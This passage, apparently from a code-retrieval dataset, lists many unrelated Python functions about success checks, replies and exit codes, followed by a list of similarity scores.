retvalname: retval}\r\n return PlatformMessage(method=\"__reply__\", kwargs=retval)", "def response(self, context, message):\r\n return True", "def ok(self):\n return self.res.ok and not self.rejected", "def success(self, target):\n self.passed += 1", "def success(self):\n return self.status == 0 and self.stdout", "def execute_failure(self, *args, **kwargs):\n return 1, \"\", None", "def success(cls, description: str = None) -> MatchResult:\n return cls(True, description)", "def is_success(self):\n return self.type_id == STATE_SUCCESS", "def success_p(self, input_meaning_p = None):\r\n return self.sys().success_p(input_meaning_p)", "def succeeded(self):\n output = self.__call__()\n if output.succeeded:\n return output or True\n return False", "def task_success(self, ref2goal=True):\n book_sess = self.match_rate(ref2goal)\n inform_sess = self.inform_F1(ref2goal)\n # book rate == 1 & inform recall == 1\n if (book_sess == 1 and inform_sess[1] == 1) \\\n or (book_sess == 1 and inform_sess[1] is None) \\\n or (book_sess is None and inform_sess[1] == 1):\n return 1\n else:\n return 0", "def _check_reply(self):\n self._more_packets_available = False\n try:\n if self._reply is None:\n self._status = (3, '{} without reply'.format(\n REPLAY_INFO[unpack_dint(self._message[:2])]))\n return False\n # Get the type of command\n typ = unpack_uint(self._reply[:2])\n\n # Encapsulation status check\n if unpack_dint(self._reply[8:12]) != SUCCESS:\n self._status = (3, \"{0} reply status:{1}\".format(\n REPLAY_INFO[typ],\n SERVICE_STATUS[unpack_dint(self._reply[8:12])]))\n return False\n\n # Command Specific Status check\n if typ == unpack_uint(ENCAPSULATION_COMMAND[\"send_rr_data\"]):\n status = unpack_usint(self._reply[42:43])\n if status != SUCCESS:\n status_msg = \"send_rr_data reply:{0} - Extend status:{1}\"\n self._status = (3, status_msg.format(\n SERVICE_STATUS[status],\n get_extended_status(self._reply, 42)))\n return False\n else:\n return True\n return True\n except Exception as e:\n raise DataError(e)", "def succeeded(self):\n return self.current_reward == 300", "def is_success(exit_code):\n return exit_code in [0, 5]", "def indicate_success(self):\n pass", 
"def result_success(result):\n\n if 200 <= result < 300:\n return True\n\n return False", "def send_command_success(self, sn: TransactionID, destination: tuple, source: tuple):\n pass", "def task_success(self, ref2goal=True):\n # for sit in list(turn_data['final_goal_state'].keys()):\n # if turn_data['final_goal_state'][sit] != {}:\n # for ssit in list(turn_data['final_goal_state'][sit].keys()):\n # if turn_data['final_goal_state'][sit][ssit] == '?':\n # return False\n # return True\n book_sess = self.match_rate(ref2goal)\n inform_sess = self.inform_F1(ref2goal)\n # book rate == 1 & inform recall == 1\n if (book_sess == 1 and inform_sess[1] == 1) \\\n or (book_sess == 1 and inform_sess[1] is None) \\\n or (book_sess is None and inform_sess[1] == 1):\n return 1\n else:\n return 0", "def respond(self):\n\n if not self.board.board:\n hand_data = HandEvaluator.evaluate_preflop_hand(self.hand)\n elif self.board:\n hand_data = HandEvaluator.evaluate_hand(self.board.cards + list(self.hand))\n if len(self.board.board) == 3:\n return Check()\n elif len(self.board.board) == 4:\n return Check()\n elif len(self.board.board) == 5:\n return Check()\n \n # always return Check() as last resort, because it beats Fold()\n return Check()", "def is_success(self):\n return self.status_code >= 200 and self.status_code < 300 and self.uuid", "def ok(*args):", "def exit_success():\n\tglobal state\n\tprint \"EXIT SUCCESS\"\n\tstate += 2 # increment state to 10", "def _fake_next_op(self, context, message, dry_run=False):\r\n if context.channel in self._fake_ops:\r\n channel = context.channel\r\n if len(self._fake_ops[channel]) > 0:\r\n if \"on_message\" not in self._fake_ops[channel][0] \\\r\n or self._fake_message_compare(self._fake_ops[channel][0][\"on_message\"], message):\r\n if \"after\" in self._fake_ops[channel][0] and self._fake_ops[channel][0][\"after\"] > 0:\r\n if dry_run:\r\n return False\r\n self._fake_ops[channel][0][\"after\"] -= 1\r\n return False\r\n if dry_run:\r\n return True\r\n instruction = self._fake_ops[channel].pop(0)\r\n if len(self._fake_ops[channel]) == 0:\r\n del self._fake_ops[channel]\r\n vprint(\"{}: faking reply\".format(self.name))\r\n reply = instruction[\"reply\"]\r\n if \"execute\" in instruction and instruction[\"execute\"] == True:\r\n result = {}\r\n if instruction[\"on_success\"]:\r\n result[\"on_success\"] = reply\r\n if instruction[\"on_failure\"]:\r\n result[\"on_failure\"] = reply\r\n return result\r\n if reply.success:\r\n self._worker.reply(context, PlatformMessage.success(reply.retval, reply.retval_name))\r\n else:\r\n self._worker.reply(context, PlatformMessage.failure(reply.state, reply.errcode))\r\n return True\r\n else:\r\n # TODO: Shouln't be here actually. 
Raise error!\r\n del self._fake_ops[channel]\r\n return False", "def reply_with_code(self, code: int) -> None:", "def reply_is_success(reply: dict):\n return (\n reply\n and type(reply) is dict\n and reply.get(\"status\", None)\n and reply[\"status\"] == \"success\"\n )", "def answer(self) -> bool:", "def _success(self, msg=\"\"):\n if msg:\n self.result[\"message\"] = msg\n self.module.exit_json(**self.result)", "def ok(self):\n return self._code == 0", "def ok(self):\n return self.status_code == 250", "def success(self, cb: CircuitBreaker) -> None:", "def handle_success(self, err, msg):\n # FIXME: Can we verify that it is actually garbage collected?\n assert \"GOOD:\" in msg.value().decode('utf-8')\n assert err is None\n assert False, \"should never come here\"", "def func_case(self):\n test.success(\"\")", "def was_successful(self):\n return self._build_proto.status == common.SUCCESS", "def __bool__(self):\n return self.is_successful", "def success(elements, action=None):\n return Result(True, elements, action)", "def is_successful(self):\n\t\treturn randint(1, 100) <= self.get_success_probability()", "def success(self, message, *args, **kwargs):\n self.counters[\"success\"] += 1\n self._write(message.format(*args, **kwargs), SUCCESS)", "def successful_response(self):\n self._requests_successful += 1", "def resp200(msg):\n return Resp({'message':msg, 'success':True})", "def kinbot(self):\n self.success = False", "def check_response(rv):\n if rv != 'OK':\n print \"No message found\"\n return False\n return True", "def is_success(self):\r\n if self.status_code < 400:\r\n return True\r\n return False", "def is_success(self):\r\n if self.status_code < 400:\r\n return True\r\n return False", "def _is_successful(response) -> bool:\n return response.status_code == 200", "def is_ok(r) -> bool:\n\tif r.status_code == 200:\n\t\treturn True", "def success_message_code(response_obj, check_util=None):\n if check_util:\n success = check_util(response_obj)\n phrase, status = assign_message_code(success)\n else:\n success = True\n phrase, status = response_obj.reason, response_obj.status_code\n return success, phrase, status", "def _response_success(self, msg, msgID):\r\n if not self._status:\r\n # Can not help it if the response takes some time and in the mean\r\n # time the interface is disabled; therefore, don't raise an error\r\n # instead just skip sending the response\r\n return\r\n\r\n self._conn.sendMessage(self._iTag, self._clsName, msg, msgID)", "def post_craft(self, craft_result, **kwargs):\n if craft_result:\n self.msg(self._format_message(self.success_message))\n elif self.failure_message:\n self.msg(self._format_message(self.failure_message))\n\n if craft_result or self.consume_on_fail:\n # consume the inputs\n for obj in self.validated_consumables:\n obj.delete()\n\n return craft_result", "def send_message(self):\r\n return \"success\"", "def has_success(self) -> bool:\n return self._has_success", "def ReturnCode(rc):\r\n return _hiew.ReturnCode(rc)", "def checkSelfReply(body):\n return 'WHAT IS MY PURPOSE' in body", "def assign_message_code(success: bool):\n return (HTTPStatus.OK.phrase, HTTPStatus.OK) if success\\\n else (HTTPStatus.INTERNAL_SERVER_ERROR.phrase, HTTPStatus.INTERNAL_SERVER_ERROR)", "def testReturn(self):\n\t\tx = BaseAction('x')\n\t\tself.failUnless(x.record() == x)", "def test_rsp_success(self):\n\n def handle(event):\n return 0x0000, event.modification_list\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n 
ae.add_supported_context(ModalityPerformedProcedureStep)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_SET, handle)]\n )\n\n ae.add_requested_context(ModalityPerformedProcedureStep)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n status, ds = assoc.send_n_set(\n ds, ModalityPerformedProcedureStep, \"1.2.840.10008.5.1.1.40.1\"\n )\n assert status.Status == 0x0000\n assert ds.PatientName == \"Test^test\"\n assoc.release()\n assert assoc.is_released\n\n scp.shutdown()", "def update_ret(self, space_no, field_types, key_tuple, op_list):\n d = self.replyQueue.get()\n packet = RequestUpdate(self.charset, self.errors, d._ipro_request_id,\n space_no, Request.TNT_FLAG_RETURN, key_tuple, op_list)\n self.transport.write(bytes(packet))\n return d.addCallback(self.handle_reply, self.charset, self.errors, field_types)", "def OnSuccess(self):\n pass", "def _sendVersion_result (self, (code, data)) :\n\n assert code == \"REPLY_HELLO\"\n\n return data", "def _is_return(self, words):\n if words[0] == 'return':\n if len(words) != 1:\n raise SyntaxError(\"File line {}: Invalid number of arguments for C_RETURN command.\".format(self._file_line))\n return True\n else:\n return False", "def execute ( self, cmdstr, rlen, repeats=4, **kwargs ):\n dbg(\"EXECUTE(%s,%d,%d,%s)\\n\" % (s2hex(cmdstr), rlen, repeats, repr(kwargs)))\n built = None\n crcerrors = 0\n for repeat in range(repeats):\n # if repeat>0:\n # trace()\n self.resume()\n self.link.lastchar = \"\"\n dbg(\"EXECUTE: tx(%s) -> \" % (s2hex(cmdstr)))\n self.link.tx(cmdstr)\n self.ncmds += 1\n if rlen == 0:\n return None\n\n if kwargs.has_key('timeout'):\n #\n # Wait for a reply until timeout\n #\n r=\"\"\n t=timer()+kwargs['timeout']\n while len(r) < rlen and timer() < t:\n c=self.link.rx(1)\n if c:\n t=timer()+kwargs['timeout']\n r += c\n # if r!= \"\":\n # break\n # if r==\"\":\n # for i in range(256):\n # self.com.tx('\\n')\n # c = self.com.rx(1)\n # if c=='!':\n # dbg(\"Sent %d \\\\n\\n\" % (i+1))\n # break\n # # raise Exception(\"\\nCOMMAND FAIL: [%s] -> [%s]\\n\" % (s2hex(cmdstr), s2hex(r)))\n # else:\n # # r += self.com.rx(rlen-1)\n # prev=timer()\n # while len(r)<rlen and timer() < t:\n # r += self.com.rx(1)\n # last=timer()\n # if last-prev > 0.001:\n # trace()\n # prev=last\n \n else:\n r = self.link.rx(rlen)\n\n if r:\n dbg(\"%s\\n\" % s2hex(r))\n else:\n dbg(\"no reply\\n\")\n\n if self.link.lastchar != '#':\n dbg(\" COMMAND FAILED\\n\")\n self.ncmdfails += 1\n continue\n\n r = r[:-1]\n if rlen <= 2:\n return r\n else:\n crc = CRC.check(cmdstr+r)\n if crc == 0:\n if built:\n dbg(\"\\nBUILT REPLY: %s:\" % s2hex(built))\n for i in range(rlen-1):\n if built[i] != r[i]:\n dbg(\" #%d\" % i)\n dbg(\"\\nGOOD REPLY: %s\\n\\n\" % s2hex(r))\n return r[:-2]\n dbg(\" CRC ERROR: 0x%04X\\n\" % crc)\n #\n # CRC error, try to correct it.\n #\n # Bytes are transfered least significant bit\n # first. Inaccurate synchronization of the device can lead\n # to the last transmitted bit (msb) of bytes to be\n # defective:\n #\n # * If the device estimated the baudrate a little too\n # high, the host can sample the stop bit (1) instead of\n # the msb. This leads to an error only if the original\n # msb is 0, then it is corrected by setting the msb back\n # to 0. Only bytes whose received msb is high are\n # concerned.\n #\n # * If the device estimated the baudrate a little too low,\n # the host can sample bit b6 instead of the msb. 
This\n # leads to an error only if the original b6 and b7 (msb)\n # are different, then it is corrected by setting b7 to\n # the opposite of b6.\n #\n\n crcerrors += 1\n self.ncrcerrors += 1\n\n if len(r) != rlen-1:\n # dbg(\" BAD REPLY #%d: %s\\n\" % (repeat,s2hex(r)))\n continue\n\n if not built:\n #\n # Display a rule to make finding bytes easier\n #\n dbg(\"\\n \")\n for i in range(rlen-1):\n dbg(\" %02d\" % i)\n dbg(\" BAD REPLY #%d: %s\\n\" % (repeat,s2hex(r)))\n\n updated = False\n if not built:\n built = r\n updated = True\n else:\n #\n # Try to build the correct frame with bytes whose b7,b6\n # bits are different\n #\n positions=[]\n for p in range(rlen-1):\n if ( (ord(built[p]) & 0xC0) == 0xC0\n or (ord(built[p]) & 0xC0) == 0x00 )\\\n and ord(r[p]) != ord(built[p]):\n\n positions.append(p)\n built = built[:p] + r[p] + built[p+1:]\n dbg(\" #%d\" % p)\n updated = True\n if updated:\n # dbg(\"\\nUPDATED BYTES:\")\n # for p in positions:\n # dbg(\" #%d\" % p)\n if CRC.check(cmdstr+built) == 0:\n dbg(\"\\nFRAME FULLY CORRECTED\\n\\n\")\n return built[:-2]\n dbg(\"\\n\")\n\n # Device a little too low?\n # Try setting b7 to the opposite of b6\n #\n if updated:\n for p in range(rlen-1):\n old = ord(built[p])\n if (old & 0xC0) == 0x00 or (old & 0xC0) == 0xC0:\n new = old ^ 0x80\n x = built[:p] + chr(new) + built[p+1:]\n crc = CRC.check(cmdstr+x)\n if crc == 0:\n dbg(\"\\nbyte #%d has been corrected \"\n \"from %02X to %02X\\n\" % (p,old,new))\n return x[:-2]\n\n # s = \"\\nCOMMAND [%s] FAILED.\" % s2hex(cmdstr)\n if len(cmdstr) > 8:\n s = \"\\nCOMMAND [%s ... %s] (%d bytes) FAILED.\" \\\n % (s2hex(cmdstr[:4]), s2hex(cmdstr[-2:]), len(cmdstr))\n else:\n s = \"\\nCOMMAND [%s] FAILED.\" % s2hex(cmdstr)\n if crcerrors > 3:\n s += _(\"\\nMany CRC unrecoverable errors detected. 
Your baudrate setting (%d) \"\\\n \"may be too high for the device.\\n\" % self.link.serial.baudrate)\n die(s)", "def __bool__(self) -> bool:\n return self.return_code == 0", "def __bool__(self) -> bool:\n return self.return_code == 0", "def __bool__(self) -> bool:\n return self.return_code == 0", "def test_success(self):\n\n @sync_performer\n def succeed(dispatcher, intent):\n return intent\n\n dispatcher = lambda _: succeed\n result = sync_perform(dispatcher, Effect(\"foo\"))\n self.assertEqual(result, \"foo\")", "def succeed(self) -> bool:\n return self.errorCode is None or len(self.errorCode) < 1", "def success(self):\n return self._success", "def get_success_message(cls, args, results):\n return cls.success_message", "def isOk(self):\n return self._isOk", "def smart_run(self, dry_run=False, silent=False,\n out_extension='out',\n success_string=\"Have a nice day.\",\n success_fct=None,\n ignore_meta=False,\n use_CCParser=True):\n origin = os.getcwd()\n if not self.is_successful(out_extension=out_extension,\n success_string=success_string,\n success_fct=success_fct,\n ignore_meta=ignore_meta,\n use_CCParser=use_CCParser):\n # change directory to wdir (submit needs to be run from there)\n os.chdir(self.meta[\"wdir\"])\n self.run(dry_run=dry_run, silent=silent)\n # take care of new status information\n self.meta[\"status\"] = 'PENDING'\n self.save_meta()\n # change back to origin folder\n os.chdir(origin)", "def action_success(result):\n response = {\n ControllerConstants.ACTIVITY_STATUS: ControllerConstants.SUCCESS_STATUS,\n }\n if result:\n response[ControllerConstants.RESPONSE] = result\n return create_response(response)", "def retry(self):\n # XXX: check whether it is possible to distingish \n # between the error conditions and set meaningfull exitcode\n return False", "def testRecord(self):\n\t\tfca = FunctionCallAction(('key',), 'c', 'd', 'ret')\n\t\tself.failUnless(fca.record() == 'ret')", "def passed(self):\n if self.result == RESULT_PASS:\n return True\n\n return False", "def determine_exit_code(self) -> int:", "def get_exit_code(self):", "def send_message_success(self, sn: TransactionID, destination: tuple, source: tuple):\n pass", "def _default_is_success(status_code):\n\n return status_code >= 200 and status_code < 300", "def test_rsp_success(self):\n\n def handle(event):\n return 0x0000\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(BasicFilmSession)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_DELETE, handle)]\n )\n\n ae.add_requested_context(BasicFilmSession)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n status = assoc.send_n_delete(BasicFilmSession, \"1.2.840.10008.5.1.1.40.1\")\n assert status.Status == 0x0000\n assoc.release()\n assert assoc.is_released\n\n scp.shutdown()", "def success():\n sys.stdout.write('%s[ pass ]%s\\n' % (colors.GREEN, colors.RESET))", "def isfailure(self):\n\n return self.proc.returncode != 0", "def is_pipe_success(self, pipe_res):\n return reduce(\n lambda x, y: bool(x) & bool(y),\n pipe_res)", "def _validate_post(self, value, name, result):\n return result", "def respond(cmd,t,p):\n\tt.write(cmd)\n\treturn wait(t,p)" ]
[ "0.63443524", "0.58786947", "0.58400226", "0.58400226", "0.58263105", "0.58013785", "0.57647425", "0.57602125", "0.5742646", "0.57332826", "0.5728719", "0.5713388", "0.5706354", "0.5559924", "0.5558752", "0.5544535", "0.55265385", "0.55088335", "0.5459527", "0.5437543", "0.54271376", "0.5426846", "0.54181755", "0.54091865", "0.5402995", "0.5401155", "0.5393572", "0.53782433", "0.53753966", "0.537299", "0.5353333", "0.53497726", "0.53237605", "0.5322524", "0.53204346", "0.53204066", "0.531843", "0.53113306", "0.5300499", "0.529691", "0.52931345", "0.52611256", "0.524945", "0.5241767", "0.523285", "0.5227628", "0.5224248", "0.52233267", "0.5221205", "0.52178365", "0.52134615", "0.5213157", "0.52124906", "0.52104926", "0.5206622", "0.52047867", "0.5202804", "0.5199894", "0.5196887", "0.5196887", "0.51948535", "0.5191946", "0.5183715", "0.51659876", "0.51628864", "0.5157835", "0.5157183", "0.51540375", "0.515362", "0.5141398", "0.51389194", "0.5132584", "0.5129415", "0.5123684", "0.5118379", "0.51164997", "0.5110968", "0.5110064", "0.5110064", "0.5110064", "0.510931", "0.5076756", "0.5068761", "0.50653976", "0.50540495", "0.50520945", "0.5047503", "0.5039637", "0.5033777", "0.5032815", "0.5028121", "0.50217015", "0.50108826", "0.50090235", "0.500854", "0.50020915", "0.499289", "0.49926358", "0.49914607", "0.49910995" ]
0.56434834
13
Send data to the process's stdin
def sendData (self, data) :\n\n        assert len(data) <= 255\n\n        return self.sendCommand("CMD_IN_DATA_STDIN", data).addCallback(self._sendData_result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write( self, data ):\n os.write( self.stdin.fileno(), data )", "def stdin_read(self, data):\n self.write_master(data)", "def send_data(sock):\n while True:\n data = sys.stdin.readline()\n sock.send(data.encode())", "def send_msg(self, msg):\n self.proc.stdin.write(msg)", "def send_stdin(self, s_bytes):\n self._proc.stdin.write(s_bytes)\n self._proc.stdin.flush()", "def send(self, data):\n\n if self.subprocess.poll() is None:\n try:\n self.subprocess.stdin.write(\"{}\\n\".format(str(data).encode()))\n except IOError as e:\n logging.warning(\"IPC: Failed to send data! IOError: {}\".format(e))\n\n logging.debug(\"IPC: {}\".format(str(data)))\n else:\n logging.error(\"IPC: Process is dead! Poll: {}\".format(self.subprocess.poll()))", "def write( shell, data ):\n #print 'cmd: ' + data\n global waiting\n os.write( shell.stdin.fileno(), data )\n waiting = True", "def _direct_stdin_writer(self, msg):\n with self._stdin_lock:\n msg += \"\\n\"\n m = msg.encode(\"utf-8\")\n self._log(\"raw\", \"write to stdin : {0}\".format(m))\n self._popen.stdin.write(m)", "def stdin(self):\n pass", "def send(self, sendstring):\n self.__proc.stdin.write(sendstring+'\\n')", "def _on_stdin_read(self, data):\n if not self.opts[\"udp\"]:\n self.fire(write(data))\n else:\n self.fire(write((self.host, self.port), data))", "def _stdin_writer(self):\n self._is_launched.wait()\n while True:\n message = self.stdin_queue.get()\n if message is None or self._is_stopping or not self._is_running.is_set():\n if message is not None:\n log.debug(\"Ignore {0} on process {1} because it's stopped\".format(message, self.name))\n break\n self._direct_stdin_writer(message)\n self._log(\"raw\", \"write to stdin : {0}\".format(message.encode(\"utf-8\")))", "def call_and_feed(cmd, data):\n p = Popen(cmd, shell=True, stdin=PIPE)\n p.stdin.write(data)\n p.stdin.close()\n return p.wait()", "def sendCommand(self, command):\n if(self.process is not None):\n try:\n self.process.stdin.write(command + '\\n')\n except:\n pass", "def write(self, command):\n self.stdin_stream.write(command)\n self.stdin_stream.flush()", "def console(self, message):\n if self.proc is None or self.proc.poll() is not None:\n return\n message = message.split('\\n')[0] + '\\n'\n self.proc.stdin.write(message.encode())\n self.proc.stdin.flush()", "def sendProcessStdin(self, name, chars):\r\n self._update('sendProcessStdin')\r\n\r\n if isinstance(chars, unicode):\r\n chars = chars.encode('utf-8')\r\n\r\n if not isinstance(chars, basestring):\r\n raise RPCError(Faults.INCORRECT_PARAMETERS, chars)\r\n\r\n group, process = self._getGroupAndProcess(name)\r\n\r\n if process is None:\r\n raise RPCError(Faults.BAD_NAME, name)\r\n\r\n if not process.pid or process.killing:\r\n raise RPCError(Faults.NOT_RUNNING, name)\r\n\r\n try:\r\n process.write(chars)\r\n except OSError as why:\r\n if why.args[0] == errno.EPIPE:\r\n raise RPCError(Faults.NO_FILE, name)\r\n else:\r\n raise\r\n\r\n return True", "def test_pipe_to_stdin(self):\n original_stdin = sys.stdin\n with self.pipe_to_stdin() as input:\n self.assertNotEqual(original_stdin, sys.stdin)\n input.write(\"Hello world!\\n\")\n self.assertEqual(sys.stdin.readline(), \"Hello world!\\n\")\n self.assertEqual(original_stdin, sys.stdin)", "def put(self, value):\n self.stdin.put(value)", "def _replace_stdin(self, text):\n orig = sys.stdin\n sys.stdin = StringIO(text)\n yield\n sys.stdin = orig", "def writePipe(self, data):\n if not '[Press a key]' in data:\n subprocess.Popen(\"echo \" + str(data) + \" > /tmp/g13-0\", shell=True)", 
"def stdin_thread(self):\n while True:\n if not self.is_running():\n time.sleep(0.1)\n continue\n msg = self._stdin_queue.get()\n if msg is None:\n break # Ask to stop\n self._say(msg)", "def rshell(self, chan):\n logging.debug(\"\")\n logging.debug(\"************************************************************\")\n import select\n import termios\n import tty\n import socket\n from paramiko.py3compat import u\n oldtty = termios.tcgetattr(sys.stdin)\n try:\n tty.setraw(sys.stdin.fileno())\n tty.setcbreak(sys.stdin.fileno())\n chan.settimeout(0.0)\n while True:\n r, w, e = select.select([chan, sys.stdin], [], [])\n if chan in r:\n try:\n x = u(chan.recv(1024))\n if len(x) == 0:\n sys.stdout.write('\\n\\n')\n break\n sys.stdout.write(x)\n sys.stdout.flush()\n except socket.timeout:\n pass\n if sys.stdin in r:\n x = sys.stdin.read(1)\n if len(x) == 0:\n break\n chan.send(x)\n finally:\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)", "def get_stdin(self) :\n\t\tif self.__stdin is not None :\n\t\t\t# probably no flush\n\t\t\treturn self.__stdin.getvalue()", "def run(self):\n def target():\n # Pass these inputs to STDIN with delays\n for i in self.delayed_inputs:\n if type(i) is int or type(i) is float:\n time.sleep(i)\n elif type(i) is bytes:\n try:\n self.process.stdin.write(i) \n except IOError as e:\n lg.info(\n \"Input: {} failed to write to stdin due to\\n{}\".format(i, e)\n )\n break\n if self.disable_communicate:\n self.process.wait()\n else:\n self.stdout_res, self.stderr_res = self.process.communicate(\n input=self.inputs)\n\n try:\n self.process = Popen(self.command, stdin=self.stdin,\n stdout=self.stdout, stderr=self.stderr,\n start_new_session=True, cwd=self.cwd, env=self.env)\n except OSError:\n lg.error(\"Couldn't Popen command {}\".format(self.command))\n raise\n self.thread = Thread(target=target)\n self.thread.start()", "def monitor_stdin():\n while len(sys.stdin.read(1024)):\n pass\n if args.multi:\n client_monitor.notify_parent_exit()\n else:\n trigger_exit(ExitMode.PARENT)", "def master_read(self, data):\n self.write_stdout(data)", "def communicate(host, port):\n s = socket.socket()\n s.connect((host, port))\n payload = sys.stdin.read().encode()\n s.sendall(payload)\n s.shutdown(socket.SHUT_WR)\n\n output = []\n while True:\n read = s.recv(READ_SIZE)\n if read:\n output.append(read.decode())\n else:\n break\n return ''.join(output)", "def parse_stdin(self, data):\n return data", "def write(self, command):\n # Write command in bytes plus newline then flush.\n self.proc.stdin.write(bytes(command + \"\\n\", 'ascii'))\n self.proc.stdin.flush()\n\n self.genout()", "def _queuing_input(procQueue, stdin_fd, query, valid, default):\n sys.stdin = os.fdopen(stdin_fd)\n procQueue.put(_get_user_input(query, valid, default))", "def posix_shell(chan):\n import select\n \n oldtty = termios.tcgetattr(sys.stdin)\n try:\n tty.setraw(sys.stdin.fileno())\n tty.setcbreak(sys.stdin.fileno())\n chan.settimeout(0.0)\n\n while True:\n r, w, e = select.select([chan, sys.stdin], [], [])\n if chan in r:\n try:\n x = chan.recv(1024)\n if len(x) == 0:\n print '\\r\\n*** EOF\\r\\n',\n break\n sys.stdout.write(x)\n sys.stdout.flush()\n except socket.timeout:\n pass\n if sys.stdin in r:\n x = sys.stdin.read(1)\n if len(x) == 0:\n break\n chan.send(x)\n\n finally:\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)", "def on_stdin_send(self, debug_console, message, status):\r\n raise NotImplementedError(\r\n 'You must implement \"on_stdin_send()\" to use the \"DebugListener\"'\r\n 'class.')", 
"def read(self):\n global ALIVE\n line = sys.stdin.readline()\n if line:\n self.datalines.append(line.rstrip())\n else:\n ALIVE = False", "def _handle_stdin(self, line):\r\n return input(line.replace(STDIN_PROMPT, \"\"))", "def reader_thread(self, q):\r\n try:\r\n with self.process.stdout as pipe:\r\n for line in iter(pipe.readline, b''):\r\n q.put(line)\r\n finally:\r\n q.put(None)", "def _posix_shell(cls, chan, user_input, iotimeout, iodelay):\n timeout = 60 # 1 mins , only its only applicable to cmcli ssl commands\n result = ''\n input = list(user_input)\n input_end = 1\n try:\n chan.settimeout(iotimeout)\n input.reverse()\n start_time = time.time()\n\n while True:\n # we dont need this hack this is only happenning for ssl tests\n log.debug('Running select')\n r, w, e = select.select([chan, sys.stdin], [], [], 5)\n log.debug('select done')\n\n log.debug('r: %s' % repr(r))\n log.debug('w: %s' % repr(w))\n log.debug('e: %s' % repr(e))\n\n if chan in r:\n log.debug('rlist: wait until ready for reading')\n try:\n log.debug('channel receiving data')\n\n # Start with something\n x = \"DO IT\"\n while len(x) > 0:\n\n # Got stuff. Print it\n time.sleep(iodelay)\n log.debug('get some data')\n x = chan.recv(20480)\n last_prompt = x\n result += x\n log.debug('data received. Write it to stdout')\n sys.stdout.write(x)\n log.debug('flushing stdout')\n sys.stdout.flush()\n\n # We've sent it all. Let's get out\n if len(input) == input_end:\n log.debug('NOTHING LEFT TO SEND')\n\n # Program exited too soon\n if chan.exit_status_ready():\n log.warn('Hit exit status ready sooner than expected')\n chan.send('^D\\n')\n raise\n\n except socket.timeout:\n log.debug('All stdout exhausted')\n if len(input) > input_end:\n x = input.pop()\n log.debug('SENDING to input stream: %s' % x)\n chan_in = '%s' % x\n chan.send(chan_in)\n result += chan_in\n else:\n if chan.exit_status_ready():\n log.info('Program ready to exit')\n break\n\n # Keep reading for cmcli commands since we need to\n # wait until we get back to the prompt\n pass\n\n if not r:\n # FIXME: I think we want to inspect the the last prompt.\n # If it was input, we should probably attempt another select\n # if we are running a cmcli command\n log.debug(\"Nothing to send or unexpected prompt. 
\" +\n \"Prompt was: %s\" % last_prompt)\n raise\n\n finally:\n\n # Assume the last input is logout\n x = input.pop()\n log.debug('SENDING logout to input stream: %s' % x)\n chan_in = '%s\\n' % x\n chan.send(chan_in)\n result += chan_in\n\n log.debug('Trying to get exit status for command')\n exit_status = chan.recv_exit_status()\n log.debug('Got exit status for command: %s', exit_status)\n x = chan.recv(20480)\n log.debug(\"Last data received: %s\" % x)\n result += x\n sys.stdout.write(x)\n sys.stdout.flush()\n log.debug(\"return from posix shell\")\n return result, exit_status", "def send_command(self, data):\n try:\n self.write(data)\n reply = self.read_line()\n \n if reply == \"{}\":\n pass\n else:\n print \"send_command: received bad reply %s\" % (reply)\n sys.exit(1)\n except Exception:\n raise", "def push_data(self, data):\n self.incoming.write(data)", "def write(self):\n\n while self.dowrite:\n data = sys.stdin.readline()\n if (self.algo == \"rsa\"):\n data = self.ras_encrypt(data)\n if (self.algo == \"des\"):\n data = self.des_encrypt(data)\n if (self.algo == \"3des\"):\n data = self.triple_des_encrypt(data)\n if (self.algo == \"aes\"):\n data = self.aes_encrypt(data)\n self.conn.send(data)\n\n if (data.strip() == self.exitcode):\n self.conn.shutdown(socket.SHUT_RDWR)\n self.conn.close()\n self.dowrite = False", "def _send_data_to_nn(self,wbtData):\n\t\tself._neuralNetwork.stdin.write(\"COMM IN\\n\") # this shitty COMM IN is not really needed..to modify in closedloop.py\n\t\tself._neuralNetwork.stdin.write(wbtData)", "def prog_input(self, put_idx: int) -> None:\n self.write(int(self.stdin.pop()), put_idx)", "def on_data(self, data):\n if data is not None:\n # Send the data to the parent process\n logging.debug('Received raw data : ' + str(data))\n self.mp_queue.put(data)", "def keyboard_process(pipe):\n keyboard = WindowsKeyboardListener(pipe)\n keyboard.listen()", "def test23a(self):\n self.spawn(\"./binary\").stdin(\"1\").stdin(\"12\").stdin(\"0\").stdin(\"0\").stdin(\"0\").stdin(\"1\").stdin(\"0\").stdin(\"1\").stdin(\"1\").stdin(\"1\").stdout(\"23\\n\").exit(0)", "def interact(self):\n print('Ready to interact on socket connected with {}.'.format(self.remote_addr))\n try:\n # get initial input from user\n print('Enter input or press CTRL-D for no input.')\n data = sys.stdin.readline()\n self.remote_socket.sendall(data.encode())\n while True:\n if data.startswith('exit'):\n print('[*] Closing remote shell.')\n self.close()\n break\n # wait for response from target host\n recv_len = 1\n response = ''\n while recv_len:\n data = self.remote_socket.recv(4096)\n recv_len = len(data)\n response += data.decode()\n if recv_len < 4096:\n break\n print(response)\n # get further input from user\n print('Enter further input or press CTRL-D for no input.')\n data = sys.stdin.readline()\n self.remote_socket.sendall(data.encode())\n except Exception as e:\n print(e)\n print('[*] Closing remote shell.')\n self.close()", "def run(self, arguments=None, debug=False):\n\n # kill the child process if we receive a terminate signal\n def terminate_child_process(child, signum, frame):\n try:\n if child and signum != signal.SIGINT:\n child.terminate()\n child.wait()\n finally:\n sys.exit()\n\n # poll the pty for available data to read, then push to a queue and signal ready\n def produce_queue(queue, master_fd, slave_fd, evt, proc):\n with os.fdopen(master_fd, 'rb', 0) as task_stream:\n while 1:\n ready = select.select([master_fd], [], [], 0)[0]\n\n # exit if our process has terminated and no more 
